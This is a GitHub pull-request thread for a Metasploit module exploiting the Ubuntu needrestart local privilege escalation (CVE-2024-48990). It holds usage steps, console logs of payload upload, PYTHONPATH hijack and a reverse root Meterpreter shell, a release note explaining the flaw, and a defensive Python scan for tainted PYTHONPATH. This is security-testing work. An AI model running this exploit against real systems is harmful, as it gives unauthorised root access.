Ubuntu needrestart LPE (CVE-2024-48990) #19676

Merged 9 commits, Jan 10, 2025

@h00die (Contributor) commented Nov 22, 2024

Fixes #19675

Exploits needrestart on Ubuntu. Debian and Fedora put out patches, but after putting minor effort into testing them and a bunch of PoCs on GitHub, I gave up trying to make it work. If someone wants to expand this module, be my guest. Happily working on Ubuntu though!

Verification

  • Install the application
  • Start msfconsole
  • Get an initial shell
  • Do: use exploit/linux/local/ubuntu_needrestart_lpe
  • Do: set lhost <ip>
  • Do: set lport <port>
  • Do: set session <session>
  • Do: run
  • You should get a root shell.

@h00die changed the title from "Ubuntu needrestart LPE (CVE-2024-48990)" to "WIP: Ubuntu needrestart LPE (CVE-2024-48990)" on Nov 25, 2024
@h00die h00die marked this pull request as ready for review November 27, 2024 20:57
@cdelafuente-r7 (Contributor) left a comment

Thank you @h00die ! I just left a couple of comments for you to review when you get a chance.

Review comments on modules/exploits/linux/local/ubuntu_needrestart_lpe.rb (outdated, resolved)
@h00die changed the title from "WIP: Ubuntu needrestart LPE (CVE-2024-48990)" to "Ubuntu needrestart LPE (CVE-2024-48990)" on Nov 28, 2024
@dledda-r7 dledda-r7 self-assigned this Dec 5, 2024
@dledda-r7 (Contributor) commented Dec 9, 2024

Hello @h00die, I am trying the module against an Ubuntu 22.04.
This is the package I installed.

ii  needrestart                                3.5-5ubuntu2.4

However, the target does not look vulnerable; with set verbose true I didn't get any other information.

@h00die (Contributor, Author) commented Dec 10, 2024

https://ubuntu.com/security/CVE-2024-48990

Fixed: 3.5-5ubuntu2.2

So definitely not vulnerable. Are you running the check method and not getting output?

@dledda-r7 (Contributor) commented Dec 10, 2024

> https://ubuntu.com/security/CVE-2024-48990
>
> Fixed: 3.5-5ubuntu2.2
>
> So definitely not vulnerable. Are you running the check method and not getting output?

ouch, last number was different! not sure if I can get that version from apt gonna try now...

EDIT

Ok so, I've installed the vulnerable version of needrestart, however I am having some issues triggering the vulnerability.

msf6 exploit(linux/local/ubuntu_needrestart_lpe) > exploit

[*] Started reverse TCP handler on 172.30.226.46:4445 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5.pre.5ubuntu2 detected on Ubuntu 22.04
[*] Writing '/tmp/.6q2zZX8' (250 bytes) ...
[*] Uploading payload: /tmp/.6q2zZX8
[*] Creating directory /tmp/importlib
[*] /tmp/importlib created
[*] Uploading c_stub: /tmp/importlib/__init__.so
[*] Uploading py_script: /tmp/.UMzFtAjoc
[*] Launching exploit, and waiting for needrestart to run...

From the Metasploit side I see this, but on the target host when I do: sudo needrestart nothing happens. Could it be some configuration issue?

@dledda-r7 dledda-r7 removed their assignment Dec 13, 2024
@msutovsky-r7 msutovsky-r7 self-assigned this Dec 13, 2024
@h00die (Contributor, Author) commented Dec 21, 2024

sorry, missed that there was an update/feedback!

@h00die (Contributor, Author) commented Dec 21, 2024

> From the Metasploit side I see this, but on the target host when I do: sudo needrestart nothing happens. Could it be some configuration issue?

When you do sudo needrestart it should pop up a progress bar saying something along the lines of 'scanning processes'. Your shell should execute at the end of that progress bar. Then it'll put a whole bunch of other things on the screen as well.

I just tried this exploit again on my 3.5.pre.5ubuntu2.1 detected on Ubuntu 22.04 and no issues.

Downgraded to 3.5-5ubuntu2 to mirror your setup, had no issues:

[msf](Jobs:2 Agents:1) exploit(linux/local/ubuntu_needrestart_lpe) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5.pre.5ubuntu2 detected on Ubuntu 22.04
[*] Writing '/tmp/.hGNEfOOOIq' (250 bytes) ...
[*] Uploading payload: /tmp/.hGNEfOOOIq
[*] Creating directory /tmp/importlib
[*] /tmp/importlib created
[*] Uploading c_stub: /tmp/importlib/__init__.so
[*] Uploading py_script: /tmp/.ImbZfQ5Cr
[*] Launching exploit, and waiting for needrestart to run...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[+] Deleted /tmp/.hGNEfOOOIq
[+] Deleted /tmp/importlib/__init__.so
[+] Deleted /tmp/.ImbZfQ5Cr
[+] Deleted /tmp/importlib
[*] chown: changing ownership of '/tmp/.hGNEfOOOIq': Operation not permitted
[*] Error processing line 1 of /usr/lib/python3/dist-packages/zope.interface-5.4.0-nspkg.pth:
[*] 
[*]   Traceback (most recent call last):
[*]     File "/usr/lib/python3.10/site.py", line 192, in addpackage
[*]       exec(line)
[*]     File "<string>", line 1, in <module>
[*]   ImportError: dynamic module does not define module export function (PyInit_importlib)
[*] 
[*] Remainder of file ignored
[*] #########################
[*] 
[*] Dont mind the error message above
[*] 
[*] Waiting for needrestart to run...
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:46304) at 2024-12-21 13:04:51 -0500

(Meterpreter 4)(/home/ubuntu) > getuid
Server username: root

@msutovsky-r7 msutovsky-r7 removed their assignment Dec 30, 2024
@jheysel-r7 jheysel-r7 self-assigned this Jan 8, 2025
@jheysel-r7 (Contributor) left a comment

Thanks for the module @h00die. A couple suggestions. I think this is about ready to land 🚀

@jheysel-r7 (Contributor) left a comment

Thanks for making those changes!

msf6 exploit(linux/local/ubuntu_needrestart_lpe) > run
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.65:4545
[*] Running automatic check ("set AutoCheck false" to disable)
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > [+] The target appears to be vulnerable. Vulnerable needrestart version 3.5.pre.5ubuntu2 detected on Ubuntu 22.04
[*] Writing '/tmp/.Ft9Ac1' (250 bytes) ...
[*] Launching exploit, and waiting for needrestart to run...
[*] Sending stage (3045380 bytes) to 192.168.1.71
[+] Deleted /tmp/.Ft9Ac1
[+] Deleted /tmp/importlib/__init__.so
[+] Deleted /tmp/.smfoWGc7lZ
[+] Deleted /tmp/importlib
[*] Meterpreter session 7 opened (192.168.1.65:4545 -> 192.168.1.71:53108) at 2025-01-09 16:59:40 -0800

msf6 exploit(linux/local/ubuntu_needrestart_lpe) > sessions -i -1
[*] Starting interaction with 7...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.1.71
OS           : Ubuntu 22.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@jheysel-r7 jheysel-r7 merged commit 5374c7b into rapid7:master Jan 10, 2025
37 checks passed
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 10, 2025
@jheysel-r7 (Contributor)

Release Notes

This adds a post module which exploits needrestart on Ubuntu, before version 3.8. It allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable.
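
For the condition the release note describes (a Python interpreter started with an attacker-controlled PYTHONPATH), a host-side triage check can be sketched as below. This is an added example, not code from the pull request or from Metasploit; the function names and the "untrusted directory" heuristic (world-writable or not owned by root) are assumptions made for illustration.

```python
import os
import stat
from importlib.machinery import all_suffixes

SHADOWED = "importlib"  # stdlib package name shadowed in the module output above

def parse_environ(raw: bytes) -> dict:
    """Parse a NUL-separated /proc/<pid>/environ blob into a dict."""
    env = {}
    for item in raw.split(b"\0"):
        key, sep, value = item.partition(b"=")
        if sep:
            env[os.fsdecode(key)] = os.fsdecode(value)
    return env

def untrusted_dir(path: str) -> bool:
    """Assumed heuristic: world-writable, or not owned by root."""
    try:
        st = os.stat(path)
    except OSError:
        return False  # missing or unreadable entries are not reported
    return bool(st.st_mode & stat.S_IWOTH) or st.st_uid != 0

def shadows_stdlib(path: str) -> bool:
    """True if path holds an importlib/__init__.* the interpreter would load."""
    stem = os.path.join(path, SHADOWED, "__init__")
    return any(os.path.exists(stem + sfx) for sfx in all_suffixes())

def findings(raw_environ: bytes) -> list:
    """Return (entry, reason) pairs for suspicious PYTHONPATH entries."""
    out = []
    pythonpath = parse_environ(raw_environ).get("PYTHONPATH", "")
    for entry in filter(None, pythonpath.split(os.pathsep)):
        if shadows_stdlib(entry):
            out.append((entry, "shadows importlib"))
        elif untrusted_dir(entry):
            out.append((entry, "untrusted directory"))
    return out

def scan_proc(proc: str = "/proc") -> dict:
    """Check every readable live process; returns {pid: findings}."""
    hits = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(os.path.join(proc, pid, "environ"), "rb") as fh:
                found = findings(fh.read())
        except OSError:
            continue  # process exited, or not permitted to read it
        if found:
            hits[int(pid)] = found
    return hits
```

Run `scan_proc()` as root so every process environment is readable; a hit means the environment deserves a look, and patching needrestart to the fixed package version remains the actual remedy.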

@h00die h00die deleted the needrestart branch January 10, 2025 01:54